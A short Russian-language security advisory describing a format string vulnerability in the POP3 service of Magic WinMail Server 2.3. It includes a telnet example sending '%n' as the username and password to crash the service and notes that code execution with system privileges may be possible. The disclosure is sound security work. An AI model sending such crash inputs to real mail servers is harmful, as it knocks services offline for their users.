Уязвимость обнаружена в Magic WinMail Server. Удаленный пользователь может аварийно завершить работу почтовой службы. 

Уязвимость форматной строки обнаружена в POP3 сервисе. Удаленный пользователь может подключиться к POP3 сервису на 110 TCP порту и послать строку формата вместо имени пользователя и пароля, чтобы аварийно завершить работу сервиса. Пример: 

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
— -ERR authorization failed

Возможно уязвимость может использоваться для выполнения произвольного кода с system привилегиями. 

Уязвимость обнаружена в Magic WinMail Server 2.3.



Оставить мнение